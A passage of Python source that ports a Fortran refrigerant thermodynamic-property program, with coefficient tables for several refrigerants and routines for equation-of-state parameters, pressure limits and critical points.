-1.28616E-04, -1.09990E-07,\t\\\n\t\t\t 3.856, 0.2321, -1.0308E-4 ] )\n\t\t \n\t\t# Ref 27\n\t\t# R124, 1-CHLORO-1,2,2,2-TETRAFLOUROETHANE (C2HF5)\n\t\t#\n\t\tBData.HREF.append (\"R124\")\n\t\tBData.REFH.append (\" R124\")\n\t\tBData.CRIT.append ( [136.48, 259.96, 395.62, 3637., 0.244 ] )\n\n\t\tBData.COEFF.append ([ 4504.401, -2.574376E-3, -1.4705E-6,\t\\\n\t\t\t 0.173954, -1.79579E-4, -1.04407E-7,\t\t\\\n\t\t\t 30.9777, 0.254206, -9.36414E-5 ] )\n\t\t# Ref 28\n\t\t# R115, CHLOROPENTAFLOUROETHANE (CF2CL-CF3)\n\t\t#\n\t\tBData.HREF.append (\"R115\")\n\t\tBData.REFH.append (\" R115\")\n\t\tBData.CRIT.append ( [154.47, 233.98, 353.05, 3153.0, 0.252 ] )\n\n\t\tBData.COEFF.append ([ 3968.734, -2.471498E-3, -2.656280E-6,\t\\\n\t\t\t .1817131, -1.797986E-4, -2.305032E-7,\t\\\n\t\t\t 20.0246, .3765849E0, -2.703487E-4 ] )\n\t\t# Ref 29\n\t\t# CE-216, FROM JIM SANDS OF ORNL RECEIVED 12] )23] )91\n\t\t#\n\t\tBData.HREF.append (\"CE-216\")\n\t\tBData.REFH.append (\"CE-216\")\n\t\tBData.CRIT.append ( [166.02, 233.15, 361.8, 3094.0, 0.272 ] )\n\n\t\tBData.COEFF.append ([ 3808.5, -0.0017285, -3.81991E-6,\t\\\n\t\t\t 0.16412557, -6.60150E-5, -3.83529E-7,\t\\\n\t\t\t -52.9448624, 0.6902447, -0.0006871 ] )\n\t\t# Ref 30\n\t\t# E-125, FROM CYNTHIA GAGE 2-11-93\n\t\t#\n\t\tBData.HREF.append (\"E-125\")\n\t\tBData.REFH.append (\" E-125\")\n\t\tBData.CRIT.append ( [136.02, 238.55, 353.8, 3330.0, 0.2385 ] )\n\n\t\tBData.COEFF.append ([ 3112.3, -0.0013240, -4.48727E-6,\t\\\n\t\t\t 0.15782070, -0.0001235, -2.51097E-7,\t\\\n\t\t\t 31.5556400, 0.3137960, -0.0001836 ] )\n\t\t# Ref 31\n\t\t# R123a 1,2-DICHLORO-1,1,2-TRIFLUOROETHANE\n\t\t#\n\t\tBData.HREF.append (\"R213A\")\n\t\tBData.REFH.append (\" R123A\")\n\t\tBData.CRIT.append ([ 152.93, 303.2, 461.1, 3741.0, 0.2812 ] )\n\n\t\tBData.COEFF.append ([6376.995, -2.691077E-3, -2.524465E-7,\t\\\n\t\t\t .2016864, -2.035804E-4, -3.644260E-8,\t\\\n\t\t\t 48.23970, .1856480, 0.0 ] )\n\t\t# Ref 32\n\t\t# R143, 1,1,2-TRIFLUOROETHANE (CF2H-CFH2)\n\t\t#\n\t\tBData.HREF.append (\"R143\")\n\t\tBData.REFH.append (\" R143\")\n\t\tBData.CRIT.append ( [84.04, 277.2, 429.9, 4520.0, 0.190 ] )\n\n\t\tBData.COEFF.append ([3680.023, -2.4128619E-3, -1.183791E-6,\t\\\n\t\t\t .1221286, -8.9741778E-5, -1.068718E-7,\t\\\n\t\t\t 24.9639, .187598, -4.031996E-5 ] )\n\t\t# Ref 33\n\t\t# R218, PERFLUOROPROPANE (C3F8)\n\t\t#\n\t\tBData.HREF.append (\"R218\")\n\t\tBData.REFH.append (\" R218\")\n\t\tBData.CRIT.append ([ 188.03, 236.4, 345.1, 2680.1, 0.2994 ] )\n\n\t\tBData.COEFF.append ([ 4486.64, -1.952581E-3, -4.49894E-6,\t\\\n\t\t\t .205911, -1.493288E-4, -4.30009E-7,\t\\\n\t\t\t 23.2683, .536728, -3.97647E-4 ] )\n\t\t# Ref 34\n\t\t# E134, BIS(DIFLUOROMETHYL) (CHF2-O-CHF2)\n\t\t#\n\t\tBData.HREF.append (\"E134\")\n\t\tBData.REFH.append (\" E134\")\n\t\tBData.CRIT.append ([ 118.03, 279.3, 420.3, 4228.0, 0.224 ] )\n\n\t\tBData.COEFF.append([ 6016.695, -4.051717E-3, 8.906450E-7,\t\t\\\n\t\t\t .1718950, -2.308880E-4, 2.837796E-8,\t\t\\\n\t\t\t -26.7633, .6152671, -6.58095E-4 ] )\t\n\n\nclass Block2 (BData):\n\t# = = = = = = = = = = = = = = = = = = = = = = = = \n\t# Set Static Vars\n\t# = = = = = = = = = = = = = = = = = = = = = = = = \n\tdef __init__(self):\n\t\tself.setup()\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\t# in Python only, to fix Fortant issue\n\tdef setArr2dCol(self, arry_2dim, int_col, arr_1dim ):\n\t\tfor ncnt in range (len(arry_2dim)):\n\t\t\tarry_2dim [ncnt][int_col] = arr_1dim [ncnt]\n\t\treturn\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\tdef getArr2dCol(self, arry_2dim, int_col):\n\t\tarr_1dim = []\n\t\tfor ncnt in range (len(arry_2dim)):\n\t\t\tarr_1dim.append ( arry_2dim [ncnt][int_col])\n\t\treturn arr_1dim\n\n\t#=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.==.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=\n\tdef getArr3dLevel(self, arry_3dim, int_level):\n\t\tx_direc = len(arry_3dim)\n\t\ty_direc = len(arry_3dim[0])\n\t\tarr_2dim = [[0.0] * (y_direc +1) for i in range(x_direc)]\n\t\tfor x in range (x_direc):\n\t\t\tfor y in range (y_direc):\n\t\t\t\tarr_2dim [x][y] =( arry_3dim [x][y][int_level])\n\t\treturn arr_2dim\n\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef bconst (self, NCIN, IR, FIN):\n\t\t#\t SUBROUTINE BCONST (NCIN,IR,FIN)\n\t\t#\n\t\t# THIS ROUTINE ACCESSES THE CURVE FIT COEFFICIENTS TO THE EQUATION\n\t\t# OF STATE PARAMETERS (STORED IN BLOCK DATA BDESC) FOR THE\n\t\t# REFRIGERANT PAIR OF INTEREST. THE REFERENCE STATES FOR ENTHALPY\n\t\t# AND ENTROPY ARE ALSO COMPUTED. THIS SUBROUTINE MUST BE CALLED\n\t\t# BEFORE ANY OTHER PROPERTY ROUTINES ARE REFERENCED AND ALSO IF\n\t\t# THE MIXTURE OR THE VALUES OF THE INTERACTION COEFFICIENTS, F(I,J),\n\t\t# ARE CHANGED.\n\t\t#\n\t\t# INPUTS:\n\t\t# IR - ARRAY OF CODE NUMBERS FOR THE COMPONENTS OF THE MIXTURE\n\t\t# FIN - MIXTURE INTERACTION PARAMETER FOR BINARY PAIRS OF\n\t\t# PURE COMPONENTS\n\t\t#\n\t\t# OUTPUTS (VIA COMMON BLOCKS):\n\t\t# A - ARRAY OF A COEFFICIENTS FOR THE PURE COMPONENTS\n\t\t# B - ARRAY OF B COEFFICIENTS FOR THE PURE COMPONENTS\n\t\t# C - ARRAY OF PURE COMPONENT CP0 COEFFICIENTS\n\t\t# HR - ARRAY OF PURE COMPONENT REFERENCE\n\t\t# ENTHALPIES; THESE ARE EQUAL TO THE SATURATED LIQUID\n\t\t# ENTHALPY AT THE REFERENCE TEMPERATURE MINUS THE PERFECT\n\t\t# GAS ENTHALPY AT THE REFERENCE TEMPERATURE\n\t\t# SR - REFERENCE ENTROPIES; EQUAL TO THE DIFFERENCE BETWEEN\n\t\t# THE SATURATED LIQUID AND PERFECT GAS ENTROPIES AT THE\n\t\t# REFERENCE TEMPERATURE\n\t\t# TC - PURE COMPONENT CRITICAL TEMPERATURES\n\t\t# TREF - REFERENCE TEMPERATURES AT WHICH HR AND SR ARE COMPUTED\n\t\t# WM - PURE COMPONENT MOLECULAR WEIGHTS\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# BUBLT - COMPUTE SATURATED LIQUID AND VAPOR CONDITIONS\n\t\t# HCVCPS - COMPUTE ENTHALPY AT REFERENCE STATE\n\t\t# ENTROP - COMPUTE REFERENCE ENTROPY\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION IR(5),X(5),XV(5),FIN(5,5)\n\t\t#\t CHARACTER*6 HREF(34),REFH(34)\n\t\t#\t COMMON /NCOMP/ NC\n\t\t#\t COMMON /ESDATA/ COEFF(9,34),CRIT(5,34)\n\t\t#\t COMMON /ESPAR1/ AP(5),BP(5),F(5,5),DADT,DBDT,D2ADT,D2BDT\n\t\t#\t COMMON /HREF1/ HREF,REFH\n\t\t#\t COMMON /RDATA1/ A(0:2,5),B(0:2,5)\n\t\t#\t COMMON /RDATA2/ WM(5),TC(5)\n\t\t#\t COMMON /CPDATA/ C(0:2,5)\n\t\t#\t COMMON /HSZERO/ HZERO(34),SZERO(34)\n\t\t#\t COMMON /REF/ TREF(5),HR(5),SR(5),VR(5)\n\t\t\n\t\t#self.setup() # only in Python\n\t\t\n\t\tXV = [0.0] *(5+1)\n\t\tBData.NC = NCIN\n\t\t\n\t\tfor KR in range(1,BData.NC + 1):\t\t\t# DO 100 KR = 1,NC\n\n\t\t\tBData.WM [KR] = BData.CRIT [ IR[KR] -1] [1-1]\t#WM(KR) = CRIT(1,IR(KR))\n\t\t\tBData.TREF[KR] = BData.CRIT [ IR[KR] -1] [2-1]\n\t\t\n\t\t\tBData.TC [KR] = BData.CRIT [ IR[KR] -1] [3-1]\n\t\t\tBData.HR [KR] = 0.0\t# not required in Python\n\t\t\tBData.SR [KR] = 0.0\t# not required in Python\n\t\t\tBData.VR [KR] = 1.0\n\n\t\t\tfor J in range(KR+1 ,BData.NC + 1): \t#DO 98 J = KR + 1,NC\n\t\t\t\tBData.F[KR][J] = FIN [KR][J]\t#\tF(KR,J) = FIN(KR,J)\n\t\t\t\tBData.F[J] [KR] = FIN [KR][J]\t#98 F(J,KR) = FIN(KR,J)\n\n\t\t\tBData.F[KR][KR] = 0.0\t\t#F(KR,KR) = 0.0\n\n\t\t\tfor KC in range(0, 2+1):\t\t#DO 100 KC = 0,2\n\t\t\t\tBData.A[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 1 -1]\t\t#A(KC,KR) = COEFF(KC + 1,IR(KR))\n\t\t\t\tBData.B[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 4 -1]\t\t#B(KC,KR) = COEFF(KC + 4,IR(KR))\n\t\t\t\tBData.C[KC][KR-1] = BData.COEFF [ IR[KR] -1][KC + 7 -1]\t\t# C(KC,KR) = COEFF(KC + 7,IR(KR))\n\n\t\t# CALL BUBBLE POINT ROUTINE TO CALCULATE SATURATED LIQUID AND VAPOR\n\t\t# VOLUMES AND : CALL ENTHALPY AND ENTROPY ROUTINE TO DETERMINE\n\t\t# REFERENCE VALUES. THE HZERO AND SZERO ALLOW AN ARBITRARY VALUE\n\t\t# TO BE ASSIGNED TO THE SATURATED LIQUID H OR S AT THE REFERENCE\n\t\t# TEMPERATURE.\n\n\t\tfor KR in range(1,BData.NC + 1) :\t\t#\tDO 164 KR = 1,NC\n\t\t\tX = [0.0] * (BData.NC+1)\t\t\t# DO 160 I = 1,NC\t#160 X[I] = 0.0\n\t\t\tX[KR] = 1.0\n\t\t\n\t\t\t# [P2, P3 ,P4, P5, P6, P8] = bublt (P1, P2, P3 , P7 )\n\t\t\t# CALL BUBLT (TREF(KR),X,XV, P,VR(KR),VV,. TRUE.,.FALSE.)\n\t\t\t[X, XV, P, BData.VR[KR], VV, _] = self.bublt (BData.TREF[KR], X, XV, True) \n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HRKR, CV, CPX, VS] = self.hcvcps (1, BData.TREF[KR], BData.VR[KR], X) \t# CALL HCVCPS (1,TREF(KR),VR(KR),X, HRKR,CV,CPX,VS)\n\t\t\t\n\t\t\tBData.HR[KR] = HRKR - BData.HZERO [ IR[KR] ]\t#HR(KR) = HRKR - HZERO(IR(KR))\n\t\t\tBData.SR[KR] = self.entrop ( BData.TREF[KR], BData.VR[KR], X ) - BData.SZERO [ IR[KR]]\n\t\treturn\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef plimit (self, T, A, B): \t# ,VL,VU,PLOW,PUP\n\t\t# SUBROUTINE PLIMIT (T,A,B,VL,VU,PLOW,PUP)\n\t\t#\n\t\t# GIVEN TEMPERATURE AND EQUATION OF STATE PARAMETERS, THIS\n\t\t# ROUTINE CALCULATES THE UPPER AND LOWER BOUNDS ON PRESSURE\n\t\t# FOR WHICH THERE ARE BOTH LIQUID AND VAPOR SOLUTIONS TO THE\n\t\t# EQUATION OF STATE. IT CARRIES OUT TWO BISECTION METHOD\n\t\t# ITERATIONS TO FIND THE POINTS WHERE THE DERIVATIVE OF PRESSURE\n\t\t# W.R.T. VOLUME IS ZERO.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# A,B - EQUATION OF STATE PARAMETERS AT TEMPERATURE T\n\t\t#\n\t\t# OUTPUTS:\n\t\t# PLOW - LOWER BOUND ON PRESSURE (PLOW CAN BE NEGATIVE, THE\n\t\t# CALLING PROGRAM MUST CHECK AND CORRECT FOR NEGATIVE\n\t\t# PRESSURES)\n\t\t# PUP - UPPER BOUND ON PRESSURE (KPA)\n\t\t# VL - MOLAR VOLUME AT PLOW (M**3/KMOL)\n\t\t# VU - MOLAR VOLUME AT PUP (M**3/KMOL)\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# NONE\n\t\t#\n\t\t#\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t COMMON /RDATA4/ R\n\t\t#\t COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#\n\t\t# STATEMENT FUNCTIONS FOR THE EVALUATION OF PRESSURE AS A\n\t\t# FUNCTION OF V AND THE DERIVATIVE OF PRESSURE W.R.T\n\t\t# VOLUME AS A FUNCTION OF V\n\t\t#\n\t\tdef P(RT,V,Y,A,B):\n\t\t\treturn (RT * (1.0 + (1.0 + (1.0 - Y ) * Y ) * Y ) / pow(1.0 - Y,3) - A/(V+B))/V\n\n\t\tdef DP(RT,V,A,B,B4,B42) :\n\t\t\treslt = (-RT * (B42 * B42 + (-4.0 * B42 * B4 \\\n\t\t\t\t+ (4.0 * B42 + (4.0 * B4 + V) * V ) * V ) * V ) \\\n\t\t\t\t/ pow(V - B4,4)\\\n\t\t\t\t+ A * ( 2.0 * V + B ) / pow( V + B,2) \\\n\t\t\t\t) / ( V * V)\n\t\t\treturn reslt\n\n\t\tVPOS = 0.0 # Only in Python set starting value\n\t\tB4 = 0.25 * B\n\t\tB42 = B4 * B4\n\t\tRT = BData.R * T\n\t\t#\n\t\t# STARTING AT A VOLUME OF 12.0*B4 (WHICH HAS A POSITIVE SLOPE\n\t\t# FOR ALL 'REASONABLE' VALUES OF A, B, T) REDUCE THE VOLUME\n\t\t# UNTIL A NEGATIVE SLOPE OF P W.R.T. V IS FOUND AND THEN BEGIN\n\t\t# BISECTION METHOD TO FIND LOWER BOUND ON VOLUME AND PRESSURE.\n\t\t#\n\t\tVC = 12.0272727 * B4\n\t\tV = VC\n\t\t\n\t\tfor IT in range (1, BData.ITMAX +1):\t# DO 100 IT=1,ITMAX\n\t\t\tDPDV = DP(RT, V, A, B, B4, B42)\n\t\t\tif (DPDV <= 0.0):break\t# GOTO 116\n\n\t\t\tVPOS = V\n\t\t\tV = 0.5 * ( V + B4)\n\n\t\tVNEG = V\t\t# location 116\n\n\t\tfor IT in range (1, 20+1):\t#DO 120 IT=1,20\n\t\t\tVL = 0.5 *( VNEG + VPOS)\n\t\t\tDPDV = DP(RT, VL, A, B, B4, B42)\n\n\t\t\tif (DPDV < 0.0):\n\t\t\t\tVNEG = VL\n\t\t\telse:\n\t\t\t\tVPOS = VL\n\n\t\tY = B4/VL\n\t\t\n\t\tPLOW = P(RT, VL, Y, A, B)\n\t\t#\n\t\t# STARTING AT V = 2*A/RT INCREASE V UNTIL A NEGATIVE\n\t\t# SLOPE IS FOUND; USE WITH V = 12.0*B TO BEGIN BISECTION\n\t\t# ITERATION FOR UPPER BOUND ON PRESSURE\n\t\t#\n\t\tVPOS = VC\n\t\tV = 2.0 * A /RT\n\n\t\tfor IT in range (1, BData.ITMAX + 1):\t#DO 160 IT=1,ITMAX\n\t\t\tDPDV = DP(RT,V,A,B,B4,B42)\n\t\t\tif (DPDV <= 0.0): break\t# GOTO 164\n\t\t\tVPOS = V\n\t\t\tV = 2.0 * V\n\n\t\tVNEG = V\t\t# location 164\n\n\t\tfor IT in range (1,20 +1): # DO 180 IT=1,20\n\t\t\tVU = 0.5 * (VNEG+VPOS)\n\t\t\tDPDV = DP(RT,VU,A,B,B4,B42)\n\t\t\tif (DPDV < 0.0) :\n\t\t\t\tVNEG = VU\n\t\t\telse :\n\t\t\t\tVPOS = VU\n\n\t\tY=B4/VU\n\t\tPUP = P(RT,VU,Y,A,B)\n\t\treturn [VL,VU,PLOW,PUP] \n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef espar (self, IQ,T,X): # ,AMIX,BMIX\n\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t# [AMIX,BMIX] = self.espar (IQ,T,X)\n\t\t#\n\t\t#\t SUBROUTINE espar (IQ,T,X,AMIX,BMIX)\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE EQUATION OF STATE PARAMETERS AND THEIR\n\t\t# TEMPERATURE DEVIVATIVES AS A FUNCTION OF TEMPERATURE AND COMPOSITION\n\t\t# AS NEEDED BY THE OTHER PROPERTY ROUTINES. BASED ON THE VALUE OF THE\n\t\t# INPUT QUALifIER THE NECESSARY PARAMETERS ARE CALCULATED.\n\t\t# THE TEMPERATURE DEPENDENCE OF THE\n\t\t# A, B, AND CP0 PARAMETERS ARE CONTAINED ENTIRELY WITHIN espar;\n\t\t# ALTERNATE EXPRESSIONS REQUIRE CHANGING ONLY THIS SUBROUTINE.\n\t\t# (CHANGES IN THE COMPOSITION DEPENDENCE OF A AND B WOULD ALSO\n\t\t# REQUIRE CHANGING THE FUNCTION SUBROUTINE FOR CHEMICAL POTENTIAL.)\n\t\t#\n\t\t# INPUTS:\n\t\t# IQ - INPUT QUALIfIER\n\t\t# = 0 COMPUTE ONLY A AND B\n\t\t# > = 1 ALSO COMPUTE TEMPERATURE DERIVATIVES OF A AND B\n\t\t# > = 2 ALSO COMPUTE SECOND DERIVATIVE OF A AND B AND\n\t\t# IDEAL GAS HEAT CAPACITY\n\t\t# = 1, 2 OR 3 ALSO COMPUTE CONSTANTS FOR PURE COMPONENT ENTHALPY\n\t\t# AND ENTROPY\n\t\t# T - TEMPERATURE (K)\n\t\t# X - COMPOSITION (MOLE FRACTION COMPONENT A)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# AMIX - 'A' PARAMETER FOR MIXTURE AT T, X\n\t\t# BMIX - 'B' PARAMETER FOR MIXTURE AT T, X\n\t\t#\n\t\t# OUTPUTS (VIA COMMON BLOCKS):\n\t\t# A(I) - 'A' PARAMETER FOR PURE COMPONENT I\n\t\t# B(I) - 'B' PARAMETER FOR PURE COMPONENT I\n\t\t# F(I,J) - MIXTURE INTERACTION PARAMETER FOR BINARY PAIR I,J\n\t\t# BData.DADT - TEMPERATURE DERIVATIVE OF A\n\t\t# DBDT - TEMPERATURE DERIVATIVE OF B\n\t\t# D2ADT2 - SECOND DERIVATIVE OF A WITH RESPECT TO TEMPERATURE\n\t\t# D2BDT2 - SECOND DERIVATIVE OF B WITH RESPECT TO TEMPERATURE\n\t\t# BData.HP(I) - INTEGRAL OF CP(I) WITH RESPECT TO TEMP FOR PURE I\n\t\t# SP(I) - INTEGRAL OF (CP(I) - R) / T WITH RESPECT TO TEMP FOR PURE I\n\t\t# CP(I) - PERFECT GAS HEAT CAPACITY FOR COMPONENT I (KJ / (KG MOL K))\n\t\t#\n\t\t#\n\n\t\t#DIMENSION X(5),AJI(5,5),DAJI(5,5),DA(5,5)\n\t\t#COMMON / NCOMP / BData.NC\n\t\t#COMMON / ESPAR1 / BData.AP(5),BP(5),BData.F(5,5),DADT,DBDT,BData.D2ADT,BData.D2BDT\n\t\t#COMMON / RDATA1 / BData.A(0:2,5),BData.B(0:2,5)\n\t\t#COMMON / CPDATA / BData.C(0:2,5)\n\t\t#COMMON / HSPURE / BData.HP(5),BData.SP(5),BData.CP(5)\n\t\t#COMMON / REF / TREF(5),HR(5),SR(5),VR(5)\n\t\t#COMMON / RDATA4 / R\n\n\t\t# Local Vars\n\t\tAJI = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tDA = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tDAJI = [[0.0] * (5+1) for i in range(5+1)]\t# array(Rows, Cols) = [[0] * Cols for i in range(Rows)]\n\t\tAMIX = 0.0\n\t\tBMIX = 0.0\n\n\t\tfor I in range(1, BData.NC + 1):\t#DO 120 I = 1,NC\n\t\t\tBData.AP[I] = BData.A[0][I-1] * math.exp((BData.A[1][I-1] + BData.A[2][I-1] * T) * T)\n\t\t\tBData.BP[I] = BData.B[0][I-1] + (BData.B[1][I-1] + BData.B[2][I-1] * T) * T\n\t\t\t\n\t\t\tAJI[I][I] = X[I] * X[I] * BData.AP[I]\n\t\t\tAMIX = AMIX + AJI[I][I]\n\t\t\tBMIX = BMIX + X[I] * BData.BP[I]\n\n\t\t\tfor J in range(1, (I - 1) + 1):\t#DO 120 J = 1,I - 1\n\t\t\t\tAJI[J][I] = X[J] * X[I] * (1.0 - BData.F[J][I]) * math.sqrt(BData.AP[J] * BData.AP[I])\n\t\t\t\tAMIX = AMIX + 2.0 * AJI[J][I]\n\n\t\tif IQ >= 1 :\n\t\t\tBData.DADT = 0.0\n\t\t\tBData.DBDT = 0.0\n\n\t\t\tfor I in range(1,BData.NC + 1): \t#DO 140 I = 1,NC\n\t\t\t\tDA[I][I] = BData.A[1][I-1] + 2.0 * BData.A[2][I-1] * T\n\t\t\t\tDAJI[I][I] = AJI[I][I] * DA[I][I]\n\t\t\t\tBData.DADT = BData.DADT + DAJI[I][I]\n\t\t\t\tBData.DBDT = BData.DBDT + X[I] * (BData.B[1][I-1] + 2.0 * BData.B[2][I-1] * T)\n\t\t\t\t\n\t\t\t\tfor J in range(1, (I - 1) + 1):\t#DO 140 J = 1,I - 1\n\t\t\t\t\tDA[J][I] = 0.5 * (BData.A[1][J-1] + BData.A[1][I-1] ) + (BData.A[2][J-1] + BData.A[2][I-1] ) * T\n\t\t\t\t\tDAJI[J][I] = AJI[J][I] * DA[J][I]\n\t\t\t\t\tBData.DADT = BData.DADT + 2.0 * DAJI[J][I]\n\n\t\t\tif IQ >= 2 :\n\t\t\t\tBData.D2ADT = 0.0\n\t\t\t\tBData.D2BDT = 0.0\n\n\t\t\t\tfor I in range(1,BData.NC + 1):\t#DO 160 I = 1,NC\n\t\t\t\t\tBData.CP[I] = BData.C[0][I-1] + (BData.C[1][I-1] + BData.C[2][I-1] * T) * T\n\n\t\t\t\t\tBData.D2BDT = BData.D2BDT + 2.0 * X[I] * BData.B[2][I-1]\n\t\t\t\t\tBData.D2ADT = BData.D2ADT + DAJI[I][I] * DA[I][I] + 2.0 * AJI[I][I] * BData.A[2][I-1]\n\n\t\t\t\t\tfor J in range(1, (I - 1) + 1): #DO 160 J = 1,I - 1\n\t\t\t\t\t\tBData.D2ADT = BData.D2ADT + 2.0 * (DAJI[J][I] * DA[J][I] + AJI[J][I] * (BData.A[2][J-1] + BData.A[2][I-1]))\n\n\t\t\tif IQ <= 3 :\n\t\t\t\tif T <= 0:\n\t\t\t\t\tprint (\"\\nespar : bad input parameter, T <= 0, T=\",T)\n\t\t\t\t\tprint ('Application terminated in python\\n')\n\t\t\t\t\tsys.exit\t#('1030') to show sorce of error\n\t\t\t\t\n\t\t\t\tfor I in range(1,BData.NC + 1):\t#DO 180 I = 1,NC\n\t\t\t\t\t\n\t\t\t\t\tBData.HP[I] = (BData.C[0][I-1] + (0.5 * BData.C[1][I-1] + BData.C[2][I-1] / 3.0 * T) * T) * T\n\t\t\t\t\tBData.SP[I] = (BData.C[0][I-1] - BData.R) * math.log(T / BData.TREF[I]) \\\n\t\t\t\t\t\t + BData.C[1][I-1] * (T - BData.TREF[I])\t\t\\\n\t\t\t\t\t\t + 0.5 * BData.C[2][I-1] * (T * T - (BData.TREF[I]**2))\n\n\t\treturn [AMIX, BMIX ]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef critx (self, X, TTC): #, TTC, PC, VC\n\t\t#\t SUBROUTINE CRITX (X,TTC,PC,VC)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE FINDS THE CRITICAL POINT PREDICTED BY THE\n\t\t# EQUATION OF STATE. FOR A MIXTURE THE CRITICAL POINT IS\n\t\t# THAT OF A PSEUDO-PURE COMPONENT HAVING THE SAME 'A' AND\n\t\t# 'B' PARAMETERS AS THE MIXTURE; IN GENERAL, SUCH A PSEUDO-\n\t\t# PURE CRITICAL POINT WILL BE BELOW THE ACTUAL MIXTURE\n\t\t# CRITICAL POINT.\n\t\t#\n\t\t# INPUTS:\n\t\t# X - MIXTURE COMPOSITION (MOL FRAC)\n\t\t# TTC - INITIAL GUESS FOR THE CRITICAL TEMPERATURE (K)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# TTC - CRITICAL TEMPERATURE (K)\n\t\t# PC - CRITICAL PRESSURE (KPA)\n\t\t# VC - CRITICAL VOLUME (M**3/KMOL)\n\t\t#\n\t\t# OTHER SUBROUTINE REFERENCED:\n\t\t# ESPAR - CALCULATION OF EQUATION OF STATE PARAMETERS\n\t\t#\n\t\t#\t COMMON /RDATA4/ R\n\t\t\n\t\t#-- Common REF group ---------------------------------\n\t\tTC = [0.0] * (3+1)\n\t\tFTC= [0.0] * (2+1)\n\t\t\n\t\tif (TTC <= 0.0):\n\t\t\tTTC = 300.0\n\n\t\tTC[1] = TTC\n\t\tJ = 1\n\t\t\n\t\tb_python_flag = True # python flag to exit loop\n\t\t\n\t\tfor IT in range (1, 20 +1 ):\t#DO 200 IT=1,20\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[AC, BC] = self.espar (0, TC[J], X)\t\t#CALL ESPAR (0,TC(J),X,AC,BC)\n\t\t\t\n\t\t\tif (BC <= 0.0):\n\t\t\t\tTC[J] = 0.5 * TC[J]\n\t\t\t\tbreak\t#GOTO 200\n\t\t\t\n\t\t\tTCC = 0.2273291 * AC / (BData.R*BC)\n\t\t\tFTC[J] = TCC - TC[J]\n\t\n\t\t\tif ( abs( FTC[J] ) < 0.01):\n\t\t\t\tb_python_flag = False\t# exit flag\n\t\t\t\tbreak \t\t\t\t\t# GOTO 240\n\t\t\t\n\t\t\tif (J <= 1):\n\t\t\t\tJ = 2\n\t\t\t\tTC[2] = min (TCC, 1.5 * TC[1] )\n\t\t\telse:\n\t\t\t\tTC[3] = TC[2] - FTC[2] * ( TC[2] - TC[1] ) / ( FTC[2] - FTC[1] )\n\t\t\t\tTC[1] = TC[2]\n\t\t\t\tTC[2] = TC[3]\n\t\t\t\tFTC[1]= FTC[2]\n\n\t\t# end of loop 200 CONTINUE\n\t\t\n\t\tif b_python_flag :\t# if false goto 240\n\t\t\tprint ('*** CRITX DID NOT CONVERGE')\n\t\t\n\t\t# 240 TTC=TC[J]\n\t\tTTC = TC[J]\n\t\tPC = 0.02386944 * AC / BC**2\n\t\tVC = 3.006818 * BC\n\t\treturn [TTC, PC, VC]\n\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\t@staticmethod\n\tdef gibbs ( T,V,A,B) :\n\t\t'''\n\t\tstatement function for GIBBS free energy\n\t\tnote that since only differences of GIBBS are used, any terms which would cancel are omitted\n\t\t'''\t\n\t\treturn BData.R * T * ( - math.log(V) \\\n\t\t\t+ 0.25 * B * ((8.0 * V - 2.25 * B) * V \\\n\t\t\t+ 0.1875 * B * B) / ((V - 0.25 * B)**2) / (V - 0.25 * B)) \\\n\t\t\t+ A / B * math.log(V / (V + B)) - A / (V + B)\n\t\t\t\t\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef bublt (self, T,XL,XV,LBUB): \n\t\t#\tSUBROUTINE BUBLT (P1, P2, P3 , P4, P5, P6, P7, P8)\n\t\t#===============if LBUB is true XL give ,return XV, XL no effect\n\t\t# [\tXL, XV, P, VL, VV, LCRIT] = bublt ( T, XL, XV, LBUB )\n\t\t# [\tP2,to P6, P8] = bublt (P1, P2, P3 , P7 )\n\t\t# [\t_, P3 to P6, P8] = bublt (P1, P2, P3 , True )\n\t\t# [\tP2, _ ,P4, P5, P6, P8] = bublt (P1, P2, P3 , False )\n\t\t#======================\n\t\t# SUBROUTINE BUBLT (T ,XL, XV, P, VL, VV, LBUB, LCRIT)\n\t\t#\n\t\t# GIVEN TEMPERATURE AND COMPOSITION OF ONE PHASE THIS 